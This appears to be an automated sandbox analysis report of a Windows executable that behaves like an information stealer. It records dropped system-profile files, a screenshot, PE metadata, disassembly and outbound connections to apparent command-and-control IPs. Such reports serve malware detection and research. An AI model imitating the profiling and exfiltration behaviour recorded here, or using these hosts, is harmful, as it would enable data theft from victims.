                                              Preview:[Location].IP: 84.17.52.45.Country: CH.City: Zurich.Zip: 8040..[General].Username: user.PC: 305090.IP: 84.17.52.45. Country: CH.System: Windows 10 Pro (64 Bit).Language: .... en-US.Date: 2023-05-24 14:09:46.TimeZone: Pacific Daylight Time (-07:00:00)..[Hardwares].CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: 6GB5NFMW.RAM: 4095MB.SCREEN: 1280x1024..[Anti-Viruses].Windows Defender...[Build].Version: 1.3.2.ID: ZR5U5KaLlZp88pLZ3Kd1rQ==.Date: 2023-05-25 00:09:46
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):21648
                                              Entropy (8bit):5.751110016568791
                                              Encrypted:false
                                              SSDEEP:192:4z9PRuQuWfMX8OeK5O70GVRSTzUgrdX0cZl6OIxrbp6AkqwfOuGC0PXIHj/i5t3z:MXSs0HlUBOW6M+OKQ
                                              MD5:D6CDA8BEF8464935608D84B349D425BF
                                              SHA1:F75DE69262D22BB5A22CB84B238ECC6BE23893A8
                                              SHA-256:7C484B0C73EC2FC135BE9153ECE3C04BCBF190BFFECCC8B808051542F1DFA085
                                              SHA-512:5D0C1FBE984AFAD6D26C1DD45776B68ED82543745CBF8009E979B5B3D761E6514D54E28F8DFA1AF135B26BCFE2155792C952668CADBD049C27A419E346FC8E84
                                              Malicious:false
                                              Preview:#1.Name: svchost.PID: 1684.EXE: C:\Windows\System32\svchost.exe..#2.Name: DxxqABrirJvQHOUPYbkIniH.PID: 6032.EXE: C:\Program Files (x86)\qeDoytSEEXNLUzjkCLeWSVHdQUcKXSweKFAgophLwjjAdeucovddhaBxSNkLiXwBcoZXkM\DxxqABrirJvQHOUPYbkIniH.exe..#3.Name: svchost.PID: 3012.EXE: c:\windows\system32\svchost.exe..#4.Name: DxxqABrirJvQHOUPYbkIniH.PID: 3008.EXE: C:\Program Files (x86)\qeDoytSEEXNLUzjkCLeWSVHdQUcKXSweKFAgophLwjjAdeucovddhaBxSNkLiXwBcoZXkM\DxxqABrirJvQHOUPYbkIniH.exe..#5.Name: DxxqABrirJvQHOUPYbkIniH.PID: 6020.EXE: C:\Program Files (x86)\qeDoytSEEXNLUzjkCLeWSVHdQUcKXSweKFAgophLwjjAdeucovddhaBxSNkLiXwBcoZXkM\DxxqABrirJvQHOUPYbkIniH.exe..#6.Name: svchost.PID: 848.EXE: c:\windows\system32\svchost.exe..#7.Name: svchost.PID: 2140.EXE: c:\windows\system32\svchost.exe..#8.Name: svchost.PID: 1708.EXE: c:\windows\system32\svchost.exe..#9.Name: DxxqABrirJvQHOUPYbkIniH.PID: 6016.EXE: C:\Program Files (x86)\qeDoytSEEXNLUzjkCLeWSVHdQUcKXSweKFAgophLwjjAdeucovddhaBxSNkLiXwBcoZXkM\DxxqABrirJvQHOUPYbkIn
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                              Category:dropped
                                              Size (bytes):84470
                                              Entropy (8bit):7.898142179157835
                                              Encrypted:false
                                              SSDEEP:1536:CmdwWq7SzqenFHH9dUP9lBrCMFdmiNR1RJIBmnVBREXpbiRPDxU:vdwWqezqgpH4BrCum6IUnzR81YU
                                              MD5:E9612967119F75EC50D28AE47DABF923
                                              SHA1:8399AAEAFEF1258C62557D7EF6D35F8A0C3C621F
                                              SHA-256:7F7E9492CEE63F31B5B26ADE570D5DFC5E3AD2197CB7F91DB3C92F7AFFCA526B
                                              SHA-512:5FAB6039A1CAE905D6790A01362676B2E7B30A1A9971E36374E26F20F7F68186B4C6EB299E68AE165523BAE4814B95C14EF8956A7AD205BCC491F55FCDFF4A21
                                              Malicious:false
                                              Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              File Type:Unicode text, UTF-8 text
                                              Category:dropped
                                              Size (bytes):38204
                                              Entropy (8bit):5.140010169770588
                                              Encrypted:false
                                              SSDEEP:96:cBD16fzBVrNpcCWKXOJDpVX8dEXOr8VtSZuRc85+8/1165N6N8HC6N8an6N8ds6n:0AfgW0ddrAA1YBrAft8MWdvnIHPHtdW
                                              MD5:A2A658925244F28F9BEAE4C9F64AA67B
                                              SHA1:F1A4135EE2F9BD9A55B087A943EAF2DED33B4312
                                              SHA-256:0B2CB54E08BCF114DA125138E781EF8B62DADCD6E5A8DD6922045DD984EE7F28
                                              SHA-512:EF88E2A2285210BE90C627360FAD1AD231329AA084E1E79F00273FE4E5F782BEE448A3959E167CC8064E407E4298648C7EC880A155ADD87C0DF4F4B39B74884B
                                              Malicious:false
                                              Preview:#1.Application: Google.Chrome.Version: 104.0.5112.81.Location: C:\Program Files\Google\Chrome\Application..#2.Application: Microsoft Office Professional Plus 2016.Version: 16.0.4266.1001.Location: C:\Program Files (x86)\Microsoft Office..#3.Application: Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501.Version: 12.0.30501.0.Location: [unknown install path]..#4.Application: Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005.Version: 12.0.21005.Location: [unknown install path]..#5.Application: Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319.Version: 10.0.30319.Location: [unknown install path]..#6.Application: Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702.Version: 14.21.27702.Location: [unknown install path]..#7.Application: Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702.Version: 14.21.27702.Location: [unknown install path]..#8.Application: Java 8 Update 211.Version: 8.0.2110.12.Location: C:\Program Files (x86)\Java\jre1.8.0_21
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):18260
                                              Entropy (8bit):5.718496242977151
                                              Encrypted:false
                                              SSDEEP:192:g6zzS0f50usL1gqaOQ0q6MXT8OTKI1oY7j+GlRKUqPDLtgg5ZuDvI0o9QyCD44ZH:lJIFgD
                                              MD5:C45A716A68C3954AA5BFD070F489C707
                                              SHA1:780E376783663263B23DF6545551D89E9D8AC668
                                              SHA-256:B18A54BEEB651DF3DDD8163EE4C22F4D331D56C8B88A332E75D8C31C02CFE602
                                              SHA-512:F88A0F283128CD26FCB65E1B755D0A7C9A716741120E45015DAB772A556800C94F7F473C31D24A7B2CCB87C05F3138F6E2DAF2CD708A45D369256E2EA5B36619
                                              Malicious:false
                                              Preview:#1.Name: DxxqABrirJvQHOUPYbkIniH.Title: New Tab - Google Chrome.PID: 6032.EXE: C:\Program Files (x86)\qeDoytSEEXNLUzjkCLeWSVHdQUcKXSweKFAgophLwjjAdeucovddhaBxSNkLiXwBcoZXkM\DxxqABrirJvQHOUPYbkIniH.exe..#2.Name: DxxqABrirJvQHOUPYbkIniH.Title: New Tab - Google Chrome.PID: 3008.EXE: C:\Program Files (x86)\qeDoytSEEXNLUzjkCLeWSVHdQUcKXSweKFAgophLwjjAdeucovddhaBxSNkLiXwBcoZXkM\DxxqABrirJvQHOUPYbkIniH.exe..#3.Name: DxxqABrirJvQHOUPYbkIniH.Title: New Tab - Google Chrome.PID: 6020.EXE: C:\Program Files (x86)\qeDoytSEEXNLUzjkCLeWSVHdQUcKXSweKFAgophLwjjAdeucovddhaBxSNkLiXwBcoZXkM\DxxqABrirJvQHOUPYbkIniH.exe..#4.Name: DxxqABrirJvQHOUPYbkIniH.Title: New Tab - Google Chrome.PID: 6016.EXE: C:\Program Files (x86)\qeDoytSEEXNLUzjkCLeWSVHdQUcKXSweKFAgophLwjjAdeucovddhaBxSNkLiXwBcoZXkM\DxxqABrirJvQHOUPYbkIniH.exe..#5.Name: DxxqABrirJvQHOUPYbkIniH.Title: New Tab - Google Chrome.PID: 6412.EXE: C:\Program Files (x86)\qeDoytSEEXNLUzjkCLeWSVHdQUcKXSweKFAgophLwjjAdeucovddhaBxSNkLiXwBcoZXkM\DxxqABrirJvQHOUPYbk
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):13
                                              Entropy (8bit):3.0269868333592873
                                              Encrypted:false
                                              SSDEEP:3:r+FGn:rIGn
                                              MD5:BCA2CD848281D1BE066F6662DBE553C9
                                              SHA1:A364F1914422B75E0D1F702696356B93A1F4DCFD
                                              SHA-256:297AD70879E17987BFEEFCB929FB7243F09D838FB00A3FD54E90E0130B60635B
                                              SHA-512:4770FE3C24E97155E13B67921374EE8138EC4DE1D614B90CE8B9CFE892D25B84C388A3996E644DF4926921CD38934CBD35E955C3659D6A152DFA591DF81D1739
                                              Malicious:false
                                              Preview:OK@05-24-2023
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):208
                                              Entropy (8bit):4.014803491654171
                                              Encrypted:false
                                              SSDEEP:3:J+Q1EEOR425Q425Q425Q425Q425Q425Q425Q425Q42fWXHyv:J1+42i42i42i42i42i42i42i42i42fQc
                                              MD5:7A1F4A8B1C6E0E98A5A77BE8161835E4
                                              SHA1:27525727A833A283E897317B1BC229B36EE0B004
                                              SHA-256:45B297BC10BFBB2EF96AF2AD176C88D6C90C33EB786A6A4230498F1E1AECECB1
                                              SHA-512:E6253073BD79E552E500DE6E2BC07A123B7EE99BA19EDB8909FC7BDC21621E2E90DE42D6E7DD5986C450276A0CC95EC1425997A2A58D01FC2E217542A9B5A6E8
                                              Malicious:false
                                              Preview:4645..[FIND:]take it everywhere..take it everywhere..take it everywhere..take it everywhere..take it everywhere..take it everywhere..take it everywhere..take it everywhere..take it everywhere..saua732bAUa21..
                                              File type:PE32 executable (console) Intel 80386, for MS Windows
                                              Entropy (8bit):3.2880071723280664
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:file.exe
                                              File size:1219328
                                              MD5:2df2884b8b1a86fa61343ea81352ec77
                                              SHA1:83dc7863e234f48607a16f0be43290259088dfd2
                                              SHA256:e0cc3040ad1009bda35882a71398733e14701fc0829e2d5dc84d920f6a72ec42
                                              SHA512:33b20badf32f3837d6386a4a891d2da2184068f4b3b14ce4e111bb16fed5f92d2822a2ce67d67a2ad71ca7dc6412546ddb77ff41922b0aa1202824b6164ff51b
                                              SSDEEP:12288:wPCpeRXPo3ZYOlNLOPZ7lxwberqf/9ssT:wP/PC5f4lGb2e/qM
                                              TLSH:4245D012B5E2C072D873153209E8DBBA5A7D79304B6599DF63E40F7E8F302C19732A66
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.I.{.'.{.'.{.'...$.v.'..."...'...#.m.'.4.#.j.'.4.$.n.'...&.~.'.{.&. .'.4.".5.'.....z.'...%.z.'.Rich{.'........................
                                              Icon Hash:90cececece8e8eb0
                                              Entrypoint:0x4097fb
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows cui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x646D156E [Tue May 23 19:35:10 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:632364d9eea56f3f6aa7f9395c999741
                                              Signature Valid:false
                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 9/20/2021 5:00:00 PM 9/12/2024 4:59:59 PM
                                              Subject Chain
                                              • CN=Logitech Inc, O=Logitech Inc, L=Newark, S=California, C=US
                                              Version:3
                                              Thumbprint MD5:4044C5CA5550239BD53D4ECC63101E35
                                              Thumbprint SHA-1:53B2422E8E2E074AC57CB9A73E004AF7DF8BF64A
                                              Thumbprint SHA-256:73E3F0EEEB0B014D86EAE8266089DFCB490EA34296D4F67C90276D7888F0CD99
                                              Serial:0160C5354D861DED2F317645DC3FABCA
                                              Instruction
                                              call 00007F51E8C051F1h
                                              jmp 00007F51E8C04899h
                                              push ebp
                                              mov ebp, esp
                                              mov eax, dword ptr [ebp+08h]
                                              push esi
                                              mov ecx, dword ptr [eax+3Ch]
                                              add ecx, eax
                                              movzx eax, word ptr [ecx+14h]
                                              lea edx, dword ptr [ecx+18h]
                                              add edx, eax
                                              movzx eax, word ptr [ecx+06h]
                                              imul esi, eax, 28h
                                              add esi, edx
                                              cmp edx, esi
                                              je 00007F51E8C04A3Bh
                                              mov ecx, dword ptr [ebp+0Ch]
                                              cmp ecx, dword ptr [edx+0Ch]
                                              jc 00007F51E8C04A2Ch
                                              mov eax, dword ptr [edx+08h]
                                              add eax, dword ptr [edx+0Ch]
                                              cmp ecx, eax
                                              jc 00007F51E8C04A2Eh
                                              add edx, 28h
                                              cmp edx, esi
                                              jne 00007F51E8C04A0Ch
                                              xor eax, eax
                                              pop esi
                                              pop ebp
                                              ret
                                              mov eax, edx
                                              jmp 00007F51E8C04A1Bh
                                              push esi
                                              call 00007F51E8C054CBh
                                              test eax, eax
                                              je 00007F51E8C04A42h
                                              mov eax, dword ptr fs:[00000018h]
                                              mov esi, 00462A7Ch
                                              mov edx, dword ptr [eax+04h]
                                              jmp 00007F51E8C04A26h
                                              cmp edx, eax
                                              je 00007F51E8C04A32h
                                              xor eax, eax
                                              mov ecx, edx
                                              lock cmpxchg dword ptr [esi], ecx
                                              test eax, eax
                                              jne 00007F51E8C04A12h
                                              xor al, al
                                              pop esi
                                              ret
                                              mov al, 01h
                                              pop esi
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              cmp dword ptr [ebp+08h], 00000000h
                                              jne 00007F51E8C04A29h
                                              mov byte ptr [00462A80h], 00000001h
                                              call 00007F51E8C04CE1h
                                              call 00007F51E8C07A6Eh
                                              test al, al
                                              jne 00007F51E8C04A26h
                                              xor al, al
                                              pop ebp
                                              ret
                                              call 00007F51E8C10CE0h
                                              test al, al
                                              jne 00007F51E8C04A2Ch
                                              push 00000000h
                                              call 00007F51E8C07A75h
                                              pop ecx
                                              jmp 00007F51E8C04A0Bh
                                              mov al, 01h
                                              pop ebp
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              cmp byte ptr [00462A81h], 00000000h
                                              je 00007F51E8C04A26h
                                              mov al, 01h
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x345e00x3c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x11000x300.text
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1272000x2900
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000x1e20.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x327d00x1c.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x327100x0.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x270000x144.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x25bfe0x25c00False0.5696528352649006data6.659421688226366IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x270000xdd320xde00False0.5167863175675675data5.528073599858321IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x350000x2e5a00x2d800False0.9810858087225275DOS executable (block device driver \377\377\377\377N,32-bit sector-support)7.976693437889122IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .reloc0x640000x1e200x2000False0.715576171875data6.419199267341691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              .D_Haze0x660000xc394c0xc3a00False0.001094498801916933data0.0012512738879872786IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_SHARED
                                              DLLImport
                                              USER32.dllCreatePopupMenu, ShowWindow, EmptyClipboard
                                              KERNEL32.dllGetProcAddress, CreateFileW, HeapSize, GetProcessHeap, GetModuleHandleW, GetConsoleWindow, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, SetStdHandle, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, WriteConsoleW, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW
                                              TimestampSource PortDest PortSource IPDest IP
                                              May 24, 2023 14:09:51.579485893 CEST4970580192.168.2.7208.95.112.1
                                              May 24, 2023 14:09:51.615478039 CEST8049705208.95.112.1192.168.2.7
                                              May 24, 2023 14:09:51.615689039 CEST4970580192.168.2.7208.95.112.1
                                              May 24, 2023 14:09:51.616072893 CEST4970580192.168.2.7208.95.112.1
                                              May 24, 2023 14:09:51.657805920 CEST8049705208.95.112.1192.168.2.7
                                              May 24, 2023 14:09:51.706315041 CEST4970580192.168.2.7208.95.112.1
                                              May 24, 2023 14:10:10.024647951 CEST497068899192.168.2.7193.233.232.195
                                              May 24, 2023 14:10:13.207962990 CEST497068899192.168.2.7193.233.232.195
                                              May 24, 2023 14:10:19.208592892 CEST497068899192.168.2.7193.233.232.195
                                              May 24, 2023 14:10:29.021482944 CEST8049705208.95.112.1192.168.2.7
                                              May 24, 2023 14:10:29.021658897 CEST4970580192.168.2.7208.95.112.1
                                              May 24, 2023 14:10:31.335731983 CEST4970712345192.168.2.7193.233.232.195
                                              May 24, 2023 14:10:31.367582083 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.367723942 CEST4970712345192.168.2.7193.233.232.195
                                              May 24, 2023 14:10:31.368931055 CEST4970712345192.168.2.7193.233.232.195
                                              May 24, 2023 14:10:31.400773048 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.400841951 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.400876999 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.401267052 CEST4970712345192.168.2.7193.233.232.195
                                              May 24, 2023 14:10:31.433562040 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.433605909 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.433906078 CEST4970712345192.168.2.7193.233.232.195
                                              May 24, 2023 14:10:31.465743065 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.465790033 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.465920925 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.465974092 CEST4970712345192.168.2.7193.233.232.195
                                              May 24, 2023 14:10:31.466140032 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.466698885 CEST4970712345192.168.2.7193.233.232.195
                                              May 24, 2023 14:10:31.466738939 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.497973919 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.498127937 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.498184919 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.499521017 CEST1234549707193.233.232.195192.168.2.7
                                              May 24, 2023 14:10:31.499661922 CEST4970712345192.168.2.7193.233.232.195
                                              May 24, 2023 14:10:31.604773998 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.640449047 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.640604019 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.641706944 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.673569918 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.674005032 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.674782038 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.675878048 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.677144051 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.678217888 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.706753016 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.707767963 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.707849979 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.707910061 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.707994938 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.708996058 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.709023952 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.709120035 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.710179090 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.710294008 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.739969969 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.740022898 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.740041018 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.740223885 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.740329027 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.741111994 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.741261959 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.742234945 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.742369890 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.748014927 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.772351027 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.772394896 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.772461891 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:31.772483110 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.773039103 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.773247957 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.773457050 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.774255991 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.774363995 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.804474115 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:31.804517031 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:32.006870031 CEST4970580192.168.2.7208.95.112.1
                                              May 24, 2023 14:10:32.042885065 CEST8049705208.95.112.1192.168.2.7
                                              May 24, 2023 14:10:32.203778982 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:32.203819990 CEST50014970885.192.63.194192.168.2.7
                                              May 24, 2023 14:10:32.203891993 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:32.204457045 CEST497085001192.168.2.785.192.63.194
                                              May 24, 2023 14:10:32.236315966 CEST50014970885.192.63.194192.168.2.7
                                              TimestampSource PortDest PortSource IPDest IP
                                              May 24, 2023 14:09:51.471364975 CEST5333653192.168.2.78.8.8.8
                                              May 24, 2023 14:09:51.498056889 CEST53533368.8.8.8192.168.2.7
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              May 24, 2023 14:09:51.471364975 CEST192.168.2.78.8.8.80x93a9Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              May 24, 2023 14:09:51.498056889 CEST8.8.8.8192.168.2.70x93a9No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                              • ip-api.com
                                              • 85.192.63.194:5001
                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.749705208.95.112.180C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampkBytes transferredDirectionData
                                              May 24, 2023 14:09:51.616072893 CEST93OUTGET /json HTTP/1.1
                                              Host: ip-api.com
                                              Connection: Keep-Alive
                                              May 24, 2023 14:09:51.657805920 CEST93INHTTP/1.1 200 OK
                                              Date: Wed, 24 May 2023 12:09:51 GMT
                                              Content-Type: application/json; charset=utf-8
                                              Content-Length: 287
                                              Access-Control-Allow-Origin: *
                                              X-Ttl: 60
                                              X-Rl: 44
                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 30 34 30 22 2c 22 6c 61 74 22 3a 34 37 2e 33 36 38 32 2c 22 6c 6f 6e 22 3a 38 2e 35 36 37 31 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 35 32 2e 34 35 22 7d
